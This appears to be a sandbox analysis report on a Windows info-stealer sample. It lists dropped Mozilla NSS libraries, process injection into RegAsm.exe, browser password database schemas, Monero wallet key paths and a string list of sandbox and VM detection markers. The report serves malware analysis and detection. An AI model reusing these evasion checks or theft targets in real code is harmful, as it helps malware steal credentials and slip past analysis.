                        Source: file.exeBinary or memory string: OriginalFilenameVQP.exeD vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ljhgfsd[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/25@2/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C0F7030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_004114A5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,2_2_00411807
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                        Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmp
                        Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: JDGHII.2.dr, DAEBKK.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dll
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: c:\rje\tg\obj\Release\ojc.pdb source: file.exe
                        Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.3315681328.000000003AE07000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.3310118998.000000002EF2B000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                        Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042F142 push ecx; ret 2_2_0042F155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00422D3B push esi; ret 2_2_00422D3D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DDB5 push ecx; ret 2_2_0041DDC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00432715 push 0000004Ch; iretd 2_2_00432726
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CB536 push ecx; ret 2_2_6C0CB549
                        Source: file.exeStatic PE information: section name: .text entropy: 7.99542204298472
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: section name: .text entropy: 7.999295139872825
                        Source: ljhgfsd[1].exe.2.drStatic PE information: section name: .text entropy: 7.999295139872825
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DAEBKKKEHD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                        Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                        Source: RegAsm.exeBinary or memory string: API_LOG.DLL
